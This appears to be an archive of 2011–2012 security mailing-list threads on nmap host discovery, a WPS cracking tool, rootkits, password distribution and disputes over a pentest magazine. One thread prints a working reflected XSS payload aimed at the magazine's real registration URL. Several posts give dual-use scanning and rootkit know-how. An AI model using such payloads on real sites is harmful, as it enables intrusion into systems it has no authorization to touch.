On Jan 2, 2012 1:00 PM, S Walker walke...@hotmail.co.uk wrote: Just an added note to the current replies (which are all great for hosts not in the local broadcast domain): It is almost certain that every device in your local network will respond to an ARP request. nmap does this by default anyway (-PR for local networks), but it's worth bearing in mind, as something local that won't respond to an ARP request is almost certainly not reachable. S

Date: Mon, 2 Jan 2012 12:03:42 -0500 Subject: Re: Nmap From: juan.qu...@gmail.com To: pen-t...@securityfocus.com Sorry for the late answer... But when you scan for machines that do not answer to ping (it means answer with an echo reply for each echo request), you could try using timestamp, which will return a timestamp reply, and also information request and wait for an information reply. Both could be useful also to detect equipment that does not answer to ping. And if you want something more noisy maybe a network discovery or a -P0 option. Here is a summary of message types with their port (for ICMP protocol).
0 Echo Reply
3 Destination Unreachable
4 Source Quench
5 Redirect
8 Echo
11 Time Exceeded
12 Parameter Problem
13 Timestamp
14 Timestamp Reply
15 Information Request
16 Information Reply
More detail on: http://www.faqs.org/rfcs/rfc792.html Hope it will be useful. Regards, Juan Pablo.

On Sun, Oct 2, 2011 at 4:35 PM, John M. Martinelli wrote: This would work but it would be kind of noisy to open port scan every host.
Also probably a little more time consuming. Adding in a syn scan or open port scan will create more time required as we're now looking for open ports. What if all ports are closed? Will it respond to a certain type of ICMP? I think a great question to ask is: What is the least-impactful way I can very quickly determine what hosts are alive, without a traditional ping sweep?

On Sat, Oct 1, 2011 at 10:37 PM, Jeffory Atkinson wrote: All depends on what you are trying to achieve. I would assume that you are not concerned about monitoring devices seeing you have done a ping sweep with nmap. I agree with others a port scan is going to give you the best idea if a host is active. There are many instances where filtering devices can drop ICMP or respond for hosts behind them. Open ports and services are the best identifiers. A port has to be open in some form (open or filtered) to interact with in-bound connections. I would recommend a -sS (syn) scan; you can opt for standard services or add -p1- for all 65k+ ports. All ports will be verified along with the services/daemons running. There are other options if bandwidth is an issue.

On Sep 30, 2011, at 5:17 PM, Ukpong wrote: Can somebody suggest the best NMAP commands for identifying hosts that are not responding to ICMP ping requests?

This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org
Re: [Full-disclosure] INSECT Pro - Version 3.0 Released!
Seriously, what the fuck is wrong with you? How many times have you been told that full disclosure is not the place for advertising your piece of shit software?

On Dec 30, 2011 4:43 PM, runlvl run...@gmail.com wrote: Great news!!! This 2012 we released the new version of INSECT PRO INSECT Pro 3.0 - Ultimate is here! This penetration security auditing and testing software solution is designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications. Promotional price: 50 u$d! Get your copy now! From here: http://insecurityresearch.com http://www.youtube.com/watch?v=4txmfeWKaxAfeature=player_embedded Insecurity Research Team
Re: [Full-disclosure] WiFi Protected Setup attack code posted
I'd be surprised if anyone related to security actually thought WPS was remotely safe, about time someone actually released a public tool to brute it though :P

On Dec 29, 2011 2:02 AM, Craig Heffner cheff...@devttys0.com wrote:

Yesterday, Stefan published a paper describing a vulnerability in WPS that allows attackers to recover WPA/WPA2 keys in a matter of hours (http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/). Code has been posted to implement the attack: http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html
Re: [Full-disclosure] Using hardware to attack software
Well for doing it right you pretty much just did. My main criticisms involved presentation of your work that I believed could wind up coining useless buzzwords, proliferation of bad terminology, and enforcing incorrect paradigms. Your post here clarifies much of that; I just believe it should have been emphasized in the paper more so as to avoid the chances of creating poor buzzwords, bad terminology, etc. Perhaps refocusing the paper around some sort of 'driver vulnerability taxonomy', or as you said was intended, 'overlooked/poorly understood driver attacks'. Something along those lines would have been closer to doing it right, if not nailed it. As is, the paper seems to focus on presenting the concept of utilizing hardware to beat software, when the meat of the paper is concerned with driver attack surfaces and whatnot. I hope that is clear as I sometimes have a bad habit of rambling.

On Dec 27, 2011 1:57 PM, Forristal, Jeff jeff.forris...@intel.com wrote:

Hi Gage, thanks for the feedback. Drivers certainly are a big player here, since they are the main interfacers [sic] to hardware along with BIOS and VMMs. There's also some corner-case stuff that talks to hardware like TXT ACMs, a la ITL's published SINIT work. Yes, the weaknesses live in the software. That's why the paper focused on the use of software-influenced hardware elements to facilitate an attack on (presumably more privileged) software. So your observation about 'hardware attacks' is correct, but that's not what the paper was about. Attacking the hardware directly ('hardware attacks') was claimed in the paper to be out of scope--it was always about attacking/reaching a vulnerability located in software. I believe the topic of hardware facilitated attacks is a conversation about attack surface (specifically the surface the driver exposes to the hardware), how much trust the driver gives to the hardware, and how it (is? may be?) a direction of attacks that is not as 'fortified' as other attack surfaces pointed in other directions. Drivers may expect to be attacked from above (i.e. the conceptual PC stack), but are drivers being designed and implemented to robustly withstand attacks coming from below? Should they?

And I agree, 'hardware reflected injection' is not a new vulnerability. Neither is '2nd order injection.' But both of those terms provide additional context to the attack pattern circumstances being used to reach a software weakness. My whitepaper was focusing on under-considered attacks, not new vulnerabilities specifically. Let me know if I mixed up the language somewhere--I had thought I had successfully preserved the distinction between attacks and vulnerabilities throughout. As for doing it wrong, that's fair. What do you consider to be doing it right?

Thanks,
- Jeff

-----Original Message-----
From: Gage Bystrom [mailto:themadichi...@gmail.com]
Sent: Saturday, December 24, 2011 5:21 PM
To: Forristal, Jeff; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Using hardware to attack software

While it was slightly interesting to read, and I do not doubt the intention of the whitepaper, I believe it to be nearly useless. All it is, as they say, is a 'call-to-arms' to add additional classification of vulnerabilities. Almost all of those attacks described are really driver attacks. The ones that were not driver attacks were malicious hardware. (wow I was really fighting myself on the grammar/word choice on that sentence, but I think it makes sense so screw it). I do believe that kernel/driver related vulnerabilities should have better classification in order to identify, exploit, and fix them better (much in the vein that classifying some code segment as an integer overflow aids working with memory corruption bugs); however, because almost all of those are driver bugs, a software issue, I believe they can hardly be considered 'hardware attacks'.

One slight pet peeve is that 'hardware reflected injection' sounds just like a lame attempt to create a new buzzword. Saying that failure for hardware/drivers to sanitize malicious data can lead to defects higher up is like calling the failure to sanitize return values from nested functions leading to a buffer overflow a 'function reflected injection' vulnerability. I do not believe that 'function reflected injection' warrants a classification of its own just as I believe that hardware blah blah deserves to be a classification of its own. I still respect their intent, I just think this whitepaper is completely doing it wrong.
Re: [Full-disclosure] Using hardware to attack software
While it was slightly interesting to read, and I do not doubt the intention of the whitepaper, I believe it to be nearly useless. All it is, as they say, is a 'call-to-arms' to add additional classification of vulnerabilities. Almost all of those attacks described are really driver attacks. The ones that were not driver attacks were malicious hardware. (wow I was really fighting myself on the grammar/word choice on that sentence, but I think it makes sense so screw it). I do believe that kernel/driver related vulnerabilities should have better classification in order to identify, exploit, and fix them better (much in the vein that classifying some code segment as an integer overflow aids working with memory corruption bugs); however, because almost all of those are driver bugs, a software issue, I believe they can hardly be considered 'hardware attacks'.

One slight pet peeve is that 'hardware reflected injection' sounds just like a lame attempt to create a new buzzword. Saying that failure for hardware/drivers to sanitize malicious data can lead to defects higher up is like calling the failure to sanitize return values from nested functions leading to a buffer overflow a 'function reflected injection' vulnerability. I do not believe that 'function reflected injection' warrants a classification of its own just as I believe that hardware blah blah deserves to be a classification of its own. I still respect their intent, I just think this whitepaper is completely doing it wrong.

On Fri, Dec 23, 2011 at 2:27 PM, Forristal, Jeff jeff.forris...@intel.com wrote:

Folks on this list may be interested in a recent whitepaper talking about types of attacks that leverage PC hardware to attack local software. Hardware reflected injection, anyone? Paper is available at http://www.forristal.com/material/Forristal_Hardware_Involved_Software_Attacks.pdf

Thanks, and happy holidays!
- Jeff
Re: [Full-disclosure] [Fwd: Updates on Download.Com caught adding malware to Nmap installer]
Fyodor has every right to tell them to fuck off. This is simple backstabbing no matter how you look at it. What makes me wonder is if the right people will get enraged enough to do something drastic if drastic measures are required. Truthfully I'm almost betting that there is a law or two broken here. Someone like Fyodor or anyone using that service ought to find a talented and ambitious lawyer to look over the case. A class action lawsuit is definitely applicable if a case against even a single law can be made.

On Dec 8, 2011 3:32 AM, mu...@rubos.com wrote:

Original Message
Subject: Updates on Download.Com caught adding malware to Nmap installer
From: Fyodor fyo...@insecure.org
Date: Tue, December 6, 2011 11:11 pm
To: nmap-hack...@insecure.org

Hi Folks. A lot has happened since yesterday's email about Download.com's antics (http://seclists.org/nmap-hackers/2011/5) and I wanted to send a quick update. First of all, several people complained about my angry tone and my telling Download.com to F*ck themselves. I apologize to anyone offended. But if you ever spend more than 14 years creating free software as a gift to the community, only to have it used as bait by a giant corporation to infect your users with malware, then you may understand my rage.

The good news is that many users are sick and tired of having their machines hijacked by malware. Especially by CNET Download.Com, which still says on their own adware policy page: "In your letters, user reviews, and polls, you told us bundled adware was unacceptable--no matter how harmless it might be. We want you to know what you're getting when you download from CNET Download.com, and no other download site can promise that." --http://www.cnet.com/2723-13403_1-461-16.html

Um, what people WANT when they download Nmap is Nmap itself. Not to have their searches redirected to Bing and their home page changed to Microsoft's MSN. Speaking of which, Microsoft emailed me today. They said that they didn't know they were sponsoring CNET to trojan open source software, and that they have stopped doing it. But the trojan installer uses your Internet connection to obtain more special offers from CNET, and they immediately switched to installing a Babylon toolbar and search engine redirect instead. Then CNET removed that and are now promoting their own techtracker tool. Apparently the heat is so high that even malware vendors are refusing to have any more part in CNET's antics! But if CNET isn't stopped, the malware vendors will come crawling back eventually and CNET will be there to receive them.

There have been dozens of news articles in the last day and hundreds of outraged comments on blogs, Twitter, Facebook, etc. In the midst of all this terrible PR, Download.com went in last night and quietly switched their Nmap downloads back to our real installer. At least for now. But that isn't enough--they are still infecting the installers for thousands of other packages! For example, they have currently infected the installer for a children's coloring book app: http://download.cnet.com/Kea-Coloring-Book/3000-2102_4-10360620.html Have they no shame at all??!

I've created a page with the situation background, links to the news articles, and the latest updates: http://insecure.org/news/download-com-fiasco.html Feel free to share it. Together, I hope we can get Download.Com to apologize and cease this reprehensible behavior!

Cheers,
Fyodor

___ Sent through the nmap-hackers mailing list http://cgi.insecure.org/mailman/listinfo/nmap-hackers Archived at http://seclists.org/nmap-hackers/
Re: [Full-disclosure] Google open redirect
Good point. Makes me wonder though how many people realize that ZDi and such are third parties.

On Dec 8, 2011 9:47 AM, valdis.kletni...@vt.edu wrote:

On Thu, 08 Dec 2011 14:24:21 -0300, Pablo Ximenes said:

2011/12/8 Michal Zalewski lcam...@coredump.cx

If you don't like it, let us know how to improve it. You also always have the option of not researching vulnerabilities in these platforms; going with the full-disclosure approach; or selling the flaws to a willing third party.

Well, selling flaws to third parties might be considered a crime in some places, so I would be cautious with that approach.

I suspect a large portion of the people who are selling flaws to third parties are not at all concerned about whether selling the flaw is a crime, as often the bigger question is how many crimes were committed in the discovery process...
Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial
Doesn't matter. You just gotta prove it wasn't tampered with. Conversely, you just gotta prove that it was tampered with, but by the suspect.

On Thu, Dec 8, 2011 at 8:16 PM, james.macchle...@gmail.com wrote:

Good Day All, I am looking to see if any of you know what minimum syslog level needs to be set at to be presented as proper evidence in a Court of Law? If you know, could you please let me know and point me to specific references in the Computer Forensics realm? Thank you for your assistance.

Securing Apache Web Server with thawte Digital Certificate: In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1
Re: [Full-disclosure] distributing passwords to users
O.o and you act like what he wants is a good thing? Getting /any/ service account with that file would be better than pillaging an entire server of ssh keys. With ssh keys you know you only got access to a few more servers on the network, maybe not even root or admin unless you got lucky and scored the key used for root/admin for every single box. No, with that you score the entire clientele... Not to mention what you described is not what he is asking. He wants to distribute the passwords to multiple users (idc if they are hashed, encrypted or not, just minor details at this point). What you described is a centralized database. There's only one copy of the file, only one server that holds the goods, the rest can have tidbits and if compromised can do minimum damage. Coupled with the right motivations and logging, attacking the support group on the internal network gives you almost nothing. Conversely attacking a single user holding the password file for the OP is end game. You're simply not going to be able to secure multiple copies of the same file with different access controls (hey I used a textbook phrase :) ). The only alternative is to have one access control, or all users have the same permission. However that is also absurd, you're only multiplying your attack surface with each added user. Maybe now ya see where I start wondering where the cognitive dissonance ought to be coming in for attempting what the OP is trying to do? I was wrong for assuming it should be obvious from the get go, but as you can see the ISP wasn't in the same boat he wants to board. They would be sitting in the crow's nest wondering why the loonie on the deserted island was trying to paddle it home. Alright, I think I've been harsh enough on the poor OP, but I hope he understands that this is a classic case of "You're doing it wrong." He knows what needs to be done, but his method of doing so actively works against his goal.

On Dec 6, 2011 10:51 PM, James Condron ja...@zero-internet.org.uk wrote:

An ISP I worked at stored logins for customer servers where the customer required us to be able to login to provide support. We used a webapp on our internal network with the relevant security accoutrements. It's pretty standard; you login, find the server you need credentials for and hit a button to either launch a putty session or an RDP session. You can also edit passwords or view for non-windows users. The reason tools exist is because there is a demand for them- hell, it's a password safe. Perhaps OP should look at this type of solution.

On Wed, Dec 7, 2011 at 6:28 AM, Gage Bystrom themadichi...@gmail.com wrote:

I'm disturbed in the first place that you want to distribute password lists to multiple users. I'm disturbed more so that there is no apparent cognitive dissonance preventing you from functioning enough to have sent that email. Someone please tell me that I'm not the only one disturbed here? And if I am, point to me why please?

On Mon, Dec 5, 2011 at 7:30 PM, G V gvasi...@gmail.com wrote:

Hi, From your experience, what's the best secure and easy way to update a password list and distribute it to 1000 or so unix users? The users would have different privilege levels and different access on network. Throwing ideas, I can think of: pgp (difficult to maintain a separate file for each user), web app (would need to be secured over ssl, possibly password protected), usb disks (difficult to manage changes). Anyone using an enterprise level app (commercial or not) to share passwords to users, manage changes and so on? Any other ideas I can use?

Thank you,
George Vasiliu
Re: [Full-disclosure] distributing passwords to users
I would, except I have no clue what it is he intends to do. Even then there's no reason to, it's already been done for me. As I explained to the former ISP employee guy, the ISP was doing the right thing to accomplish similar goals (I presume, like I said I have no clue why the OP wants to do what he wants to do). Of course the only caveat is that if the central database does not enforce policy or if it isn't locked down, then all sorts of disaster idioms start applying. Maybe torching a man with words doesn't help him, but it's good for showing others a point, but if a few words of advice in the right direction help him then no words while lighting flares over the right road should be even better, right?

P.S. I lied, I have no clue if the ISP's method is standard. However I do surmise that it likely worked fine with a risk level they found acceptable, which is far superior to most standard solutions I've seen stammered out by many.

On Dec 7, 2011 12:54 AM, Martijn Broos martijn.br...@traxion.com wrote:

Ok, you have been harsh enough on the poor solution the user is going to choose. Are you willing to give him some advice or directions where he should go to?

A textbook sentence I always learned was: You can burn a person with many words, it is better to help him with few in the right direction!

If he doesn’t know what he is doing wrong, then how do you think he will learn to do it right the next time. He is clearly asking for advice.

Are there standard solutions for managing passwords which need to be used by many users and securing them without telling the real password to the user who needs one to impersonate as another user?

Kind regards,
Martijn

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
Sent: Wednesday 7 December 2011 9:38
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] distributing passwords to users
Re: [Full-disclosure] one of my servers has been compromized
Oh it certainly is a distinction, and that very distinction is important enough to have caused the creation of kernel rootkits in the first place: the kernel is absolute. There is nothing any software can do without the kernel. For instance say you got a guy with a userland rootkit. He wants to hide a file so ls, and several other binaries, were modified. You load up python, whip up a quick script and boom, you can see all the previously hidden files. Kernel kit and you have to hook a few system calls and monitor the incoming values. If it would return your file and the 'password' wasn't given, you can return bogus information and EVERY tool will fall for it. Also not everything has to be done in userland to get done. The kernel is fully capable of sending out packets, creating files, etc. Userland in fact relies on the kernel for all of these. If you get to the kernel you control all of both worlds. You get the userland and in truth you only control a portion of the userland. Mighty difference indeed.

On Dec 7, 2011 7:20 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:

But whether you have a kernel rootkit or not isn't all that important. In either case the system is going to be doing unwanted things, and you detect those unwanted things with the usual system utilities. If a kernel rootkit didn't affect userland, what would be its purpose? Even to transmit data offsite you have to invoke network capabilities, file system capabilities, etc. IOW, it's a distinction without difference.

--On December 6, 2011 11:48:02 AM -0800 Gage Bystrom themadichi...@gmail.com wrote:

My bad, should have said that you can't trust the md5sum tampering (since you stated to have a static copy on the flash drive) but you couldn't trust it since you couldn't trust the system calls. The immediate moment you have to worry about a legit userland rootkit you have to worry about a kernel rootkit. After all you have to consider the psychology of the attacker. If you were to compromise a box, and cared enough to hide a backdoor they cannot detect without static, write-proof media, then you care enough to go the extra step for a kernel rootkit. Otherwise you would be spending even more time and effort to make your userland kit work to satisfaction for a far weaker hold on the box. It would simply be idiotic. And I think we can all agree that an attacker able to do either of the above is not an idiot.

On Dec 6, 2011 10:19 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:

A poor man's root kit detector is to take md5sums of critical system binaries (you'd have to redo these after patching), and keep the list on an inaccessible media (such as a thumb drive). If you think the system is compromised, run md5sum against those files, and you will quickly know. You could even keep statically compiled copies on the thumb drive to use in an investigation.

-- Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions are my own and not those of my employer.
* It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson
There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell
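A defender-side implementation of the baseline-and-verify idea from Paul's message, added here as an example and not code from anyone in the thread: it hashes the binaries, stores the list in the "DIGEST  PATH" layout that sha256sum -c reads (SHA-256 stands in for the thread's md5sum), and later classifies each file as ok, modified or missing. The temp-directory scenario in demo() is constructed; on a real system you would pass the paths of your own critical binaries and keep the baseline file on removable media, and, as Gage's caveat notes, run the check from trusted boot media so a kernel rootkit cannot answer the reads.

```python
"""Baseline-and-verify check for critical binaries (added example)."""
import hashlib
import os
import tempfile

CHUNK = 1 << 16


def hash_file(path, algo="sha256"):
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths):
    """Map each existing path to its digest.  Take this on a known-good
    system and redo it after every patch, as the thread points out."""
    return {p: hash_file(p) for p in paths if os.path.isfile(p)}


def write_baseline(baseline, out_path):
    """Write 'DIGEST  PATH' lines; 'sha256sum -c FILE' understands them."""
    with open(out_path, "w") as fh:
        for path in sorted(baseline):
            fh.write(f"{baseline[path]}  {path}\n")


def read_baseline(in_path):
    """Parse a file written by write_baseline back into a dict."""
    baseline = {}
    with open(in_path) as fh:
        for line in fh:
            line = line.rstrip("\n")
            if not line:
                continue
            digest, path = line.split("  ", 1)
            baseline[path] = digest
    return baseline


def verify(baseline):
    """Compare live files against the baseline.

    Returns {path: "ok" | "modified" | "missing"}.  Caveat from the thread:
    every read here goes through the running kernel's system calls, so a
    kernel-level rootkit can hand this check clean bytes.  Run it from
    trusted boot media to take the suspect kernel out of the loop.
    """
    report = {}
    for path, expected in baseline.items():
        if not os.path.isfile(path):
            report[path] = "missing"
        elif hash_file(path) != expected:
            report[path] = "modified"
        else:
            report[path] = "ok"
    return report


def demo():
    """Constructed scenario: three fake 'binaries' in a temp dir; after the
    baseline is taken one is trojaned and one is removed."""
    with tempfile.TemporaryDirectory() as tmp:
        bodies = {"ls": b"ELF ls", "ps": b"ELF ps", "netstat": b"ELF netstat"}
        paths = {}
        for name, body in bodies.items():
            paths[name] = os.path.join(tmp, name)
            with open(paths[name], "wb") as fh:
                fh.write(body)
        # stand-in for the thumb drive holding the baseline
        baseline_file = os.path.join(tmp, "baseline.sha256")
        write_baseline(build_baseline(paths.values()), baseline_file)

        # simulate tampering after the baseline was taken (constructed)
        with open(paths["ls"], "ab") as fh:
            fh.write(b"\n# appended bytes standing in for a trojaned ls")
        os.remove(paths["netstat"])

        report = verify(read_baseline(baseline_file))
        return {os.path.basename(p): status for p, status in report.items()}


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:9s} {name}")
```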
Re: [Full-disclosure] PenTest mag
And quite annoying. Why do you even need an email address in the first place? You're already pulling people in from a mailing list. And it's rude to require anything at all to access the content you're presenting to FD. After all that's one of the primary reasons so many people hate jsacco.

On Dec 7, 2011 12:43 PM, Dave m...@propergander.org.uk wrote:

On 07/12/2011 10:02, Olga Głowala wrote:

New issue of PenTest StarterKit is out! 23 pages of free content, feat. Gabriel Marcos - When computer Attacks. The link to download is below: http://pentestmag.com/pentest-starterkit-211-2/ http://pentestmag.com/client-side-exploits-pentest-082011/ Just scroll down and click download for free!

Quote: Follow the steps below to download the magazine: Register, accept the Disclaimer and choose subscription option. Attention! By choosing the Free Account option you will only be able to download the teaser of each issue. Verify your account using the verification link sent to your email address. Check the password sent on your email address and use it to log in. Click the download button to get the issue.

It isn't free. For the price of an email address one can get a teaser of the full 23 page content. It costs at least $220.40 for a full copy. Your post is misleading to say the least.
Re: [Full-disclosure] PenTest mag
I didn't actually bother to get the teaser but I have to ask, was the free content in the teaser 23 pages? If it is, then they weren't misleading in the email. Otherwise, they are being rude.

On Dec 7, 2011 12:46 PM, xD 0x41 sec...@gmail.com wrote:

umm, it's not misleading at all.. this is the first look and, I understood well, if you bother to visit the address... they're 'teasers' so, you don't get a FULL magazine or, kit, you only get the first like chapter/pages, that's similar to many other *products*, not freebies...
Re: [Full-disclosure] PenTest mag
Lol I get that, but was the teaser 23 pages?

On Dec 7, 2011 12:53 PM, GloW - XD doo...@gmail.com wrote:
> Well, it does force a registration, even for the teasers, that's rude, but yes, it does have a teaser for each issue.. still, is FD the place for these things, i don't know..
>
> On 8 December 2011 07:51, Gage Bystrom themadichi...@gmail.com wrote:
> > I didn't actually bother to get the teaser but I have to ask, was the free content in the teaser 23 pages? If it is, then they weren't misleading in the email. Otherwise, they are being rude.
> >
> > On Dec 7, 2011 12:46 PM, xD 0x41 sec...@gmail.com wrote:
> > > umm, it's not misleading at all.. this is the first look and, i understood well, if you bother to visit the address... they're 'teasers' so, you don't get a FULL magazine or, kit, you only get the first like chapter/pages, that's similar to many other *products*, not freebies...
> > >
> > > On 8 December 2011 07:45, Dave m...@propergander.org.uk wrote:
> > > > On 07/12/2011 10:02, Olga Głowala wrote:
> > > > > New issue of PenTest StarterKit is out! 23 pages of free content, feat. Gabriel Marcos - When computer Attacks
> > > > > The link to download is below:
> > > > > http://pentestmag.com/pentest-starterkit-211-2/
> > > > > http://pentestmag.com/client-side-exploits-pentest-082011/
> > > > > Just scroll down and click download for free!
> > > >
> > > > Quote:
> > > > Follow the steps below to download the magazine: Register, accept the Disclaimer and choose subscription option. Attention! By choosing the Free Account option you will only be able to download the teaser of each issue. Verify your account using the verification link sent to your email address. Check the password sent on your email address and use it to log in. Click the download button to get the issue.
> > > >
> > > > It isn't free. For the price of an email address one can get a teaser of the full 23 page content. It costs at least $220.40 for a full copy. Your post is misleading to say the least.
Re: [Full-disclosure] PenTest mag
...well, I guess it is 23 pages :/ but that's more annoying than if they gave out just 3 full pages

On Dec 7, 2011 12:58 PM, xD 0x41 sec...@gmail.com wrote:
> it's like a snippet from each page..
>
> On 8 December 2011 07:56, Gage Bystrom themadichi...@gmail.com wrote:
> > Lol I get that, but was the teaser 23 pages?
> >
> > On Dec 7, 2011 12:53 PM, GloW - XD doo...@gmail.com wrote:
> > > Well, it does force a registration, even for the teasers, that's rude, but yes, it does have a teaser for each issue.. still, is FD the place for these things, i don't know..
> > >
> > > On 8 December 2011 07:51, Gage Bystrom themadichi...@gmail.com wrote:
> > > > I didn't actually bother to get the teaser but I have to ask, was the free content in the teaser 23 pages? If it is, then they weren't misleading in the email. Otherwise, they are being rude.
> > > >
> > > > On Dec 7, 2011 12:46 PM, xD 0x41 sec...@gmail.com wrote:
> > > > > umm, it's not misleading at all.. this is the first look and, i understood well, if you bother to visit the address... they're 'teasers' so, you don't get a FULL magazine or, kit, you only get the first like chapter/pages, that's similar to many other *products*, not freebies...
> > > > >
> > > > > On 8 December 2011 07:45, Dave m...@propergander.org.uk wrote:
> > > > > > On 07/12/2011 10:02, Olga Głowala wrote:
> > > > > > > New issue of PenTest StarterKit is out! 23 pages of free content, feat. Gabriel Marcos - When computer Attacks
> > > > > > > The link to download is below:
> > > > > > > http://pentestmag.com/pentest-starterkit-211-2/
> > > > > > > http://pentestmag.com/client-side-exploits-pentest-082011/
> > > > > > > Just scroll down and click download for free!
> > > > > >
> > > > > > Quote:
> > > > > > Follow the steps below to download the magazine: Register, accept the Disclaimer and choose subscription option. Attention! By choosing the Free Account option you will only be able to download the teaser of each issue. Verify your account using the verification link sent to your email address. Check the password sent on your email address and use it to log in. Click the download button to get the issue.
> > > > > >
> > > > > > It isn't free. For the price of an email address one can get a teaser of the full 23 page content. It costs at least $220.40 for a full copy. Your post is misleading to say the least.
Re: [Full-disclosure] one of my servers has been compromized
You use everything but the compromised box, right. And that's because of the proliferation of kernel rootkits in the first place. Userland rootkits can be defeated quickly, easily, and sometimes by accident. A kernel rootkit can only realistically be beaten by other machines monitoring the network, imaging the hard drive, etc. As an attacker you increase the chances of losing by not using a kernel rootkit. Which is why if you're going for a rootkit, there's no reason to use a userland over kernel. Not to mention a kernel rootkit is in a better position to delay or prevent discovery in the first place barring good mitigations. Which is where my statement 'if you are worried about a userland kit, you must worry about a kernel rootkit' comes from.

On Dec 7, 2011 1:18 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:
> From a computer science standpoint there's a difference, of course, but not from an investigation standpoint. Say the kernel has a rootkit and is creating files. How do you find those files? If it's opening network connections, how do you find out what those connections are and what process is tied to them?
>
> --On December 7, 2011 10:13:42 AM -0800 Gage Bystrom themadichi...@gmail.com wrote:
> > Oh it certainly is a distinction, and that very distinction is important enough to have caused the creation of kernel rootkits in the first place: the kernel is absolute. There is nothing any software can do without the kernel. For instance say you got a guy with a userland rootkit. He wants to hide a file so ls, and several other binaries were modified. You load up python, whip up a quick script and boom you can see all the previously hidden files. Kernel kit and you have to hook a few system calls and monitor the incoming values. If it would return your file and the 'password' wasn't given, you can return bogus information and EVERY tool will fall for it. Also not everything has to be done in userland to get done. The kernel is fully capable of sending out packets, creating files, etc. Userland in fact relies on the kernel for all of these. If you get to the kernel you control all of both worlds. You get the userland and in truth you only control a portion of the userland. Mighty difference indeed.
> >
> > On Dec 7, 2011 7:20 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:
> > > But whether you have a kernel rootkit or not isn't all that important. In either case the system is going to be doing unwanted things, and you detect those unwanted things with the usual system utilities. If a kernel rootkit didn't affect userland, what would be its purpose? Even to transmit data offsite you have to invoke network capabilities, file system capabilities, etc. IOW, it's a distinction without difference.
> > >
> > > --On December 6, 2011 11:48:02 AM -0800 Gage Bystrom themadichi...@gmail.com wrote:
> > > > My bad, should have said that you can't trust the md5sum tampering (since you stated to have a static copy on the flash drive) but you couldn't trust it since you couldn't trust the system calls. The immediate moment you have to worry about a legit userland rootkit you have to worry about a kernel rootkit. After all you have to consider the psychology of the attacker. If you were to compromise a box, and cared enough to hide a backdoor they cannot detect without static, write-proof media, then you care enough to go the extra step for a kernel rootkit. Otherwise you would be spending even more time and effort to make your userland kit work to satisfaction for a far weaker hold on the box. It would simply be idiotic. And I think we can all agree that an attacker able to do either of the above is not an idiot.
> > > >
> > > > On Dec 6, 2011 10:19 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:
> > > > > A poor man's root kit detector is to take md5sums of critical system binaries (you'd have to redo these after patching), and keep the list on an inaccessible media (such as a thumb drive). If you think the system is compromised, run md5sum against those files, and you will quickly know. You could even keep statically compiled copies on the thumb drive to use in an investigation.
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions are my own and not those of my employer.
> * It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson
> There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell
Re: [Full-disclosure] PenTest mag
Nice, but is it stored? Or at least reflective?

On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote:
> still vulnerable:
>
> sample: http://pentestmag.com:80/wp-login.php?action=register (XSS)
> e-mail: john@somewhere.com</sCrIpT><sCrIpT>alert(87118)</sCrIpT>
>
> LOL
>
> On 7 Dec 2011, at 23:30, xD 0x41 wrote:
>
> Tomy supp...@vs-db.info
Re: [Full-disclosure] PenTest mag
Not really. If it isn't exploitable in any sense of the word it's not a vulnerability. It's akin to opening up Firebug, writing the generic XSS PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos.

On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote:
> it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff..
>
> Tomy
>
> On 8 Dec 2011, at 00:04, Gage Bystrom wrote:
> > Nice, but is it stored? Or at least reflective?
> >
> > On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote:
> > > still vulnerable:
> > >
> > > sample: http://pentestmag.com:80/wp-login.php?action=register (XSS)
> > > e-mail: john@somewhere.com</sCrIpT><sCrIpT>alert(87118)</sCrIpT>
> > >
> > > LOL
> > >
> > > On 7 Dec 2011, at 23:30, xD 0x41 wrote:
> > >
> > > Tomy supp...@vs-db.info
>
> Tomy supp...@vs-db.info
Re: [Full-disclosure] PenTest mag
Thank you :) nowhere near a laptop all day. Nice work Tom. Those guys are idiots indeed.

On Dec 7, 2011 3:36 PM, Ferenc Kovacs tyr...@gmail.com wrote:
> http://pentestmag.com/wp-login.php?action=register&user_login=john@somewhere.com%3C/sCrIpT%3E%3CsCrIpT%3Ealert(87118)%3C/sCrIpT%3E
>
